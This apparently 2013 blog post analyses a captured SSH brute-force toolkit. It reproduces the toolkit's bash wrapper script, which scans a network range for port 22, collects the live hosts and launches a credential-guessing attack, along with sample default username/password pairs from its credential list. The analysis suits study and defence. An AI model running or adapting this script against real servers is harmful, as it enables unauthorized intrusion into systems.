Irregular Expressions

Apr 24 2013   9:13PM GMT

SSH Brute Force Scanner – Part 2

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

The ‘data.conf’ file is a list of usernames and passwords to attempt. It contains 24,024 combinations.


root root
admin admin
test test
guest guest
webmaster webmaster

The included file ‘find’ appears to be a network scanner of some sort. I might come back to this but it is not really what I am looking for.

‘test.txt’ seems to be the output from running ‘auto’, but it looks like it was missing some flags. It is a 2.0M file with nothing but the following in it.

./assh 192.168.1.0 ; ./assh 192.168.1.0 ; ./assh 192.168.1.0 ;

‘unix’ appears to be what ties this all together now that we kinda know what each part is about.


#!/bin/bash
if [ $# != 1 ]; then
echo "[+] Folosim : $0 [b class]"
exit;
fi

echo "[+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+]"
echo "[+] SSH Brute force scanner : user & password [+]"
echo "[+] Undernet Channel : #UnixCoD [+]"
echo "[+][+][+][+][+][+][+] ver 0x10 [+][+][+][+][+][+][+]"
./find $1 22

sleep 10
cat $1.find.22 |sort |uniq > ip.conf
oopsnr2=`grep -c . ip.conf`
echo "[+] Incepe partea cea mai misto :D"
echo "[+] Doar $oopsnr2 de servere. Exista un inceput pt. toate !"
echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]"
echo "[+] Incepem sa vedem cate server putem sparge"
./atack 100
rm -rf $1.find.22 ip.conf
echo "[+] UnixCoD Scanner a terminat de scanat !"

Since they were not nice enough to put English comments in, we have to use Google translate to tell what it says. But I think we can figure it out from here.

The ‘if’ statement at the start is looking to make sure an option was provided on the command line.

if [ $# != 1 ]; then

I am pretty sure it is looking for a network range, the next command is executing ‘find’ and providing it with what was given on the command line ‘$1′ and a port. It’s port 22, no surprise here if they are looking for ssh servers.

./find $1 22

Next it creates a file called ‘ip.conf’ that contains a unique list of all of the hosts that ‘find’ located.

cat $1.find.22 |sort |uniq > ip.conf

Part 3

 Comment on this Post

 
There was an error processing your information. Please try again later.
Thanks. We'll let you know when a new response is added.
Send me notifications when other members comment.

REGISTER or login:

Forgot Password?
By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy

Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to: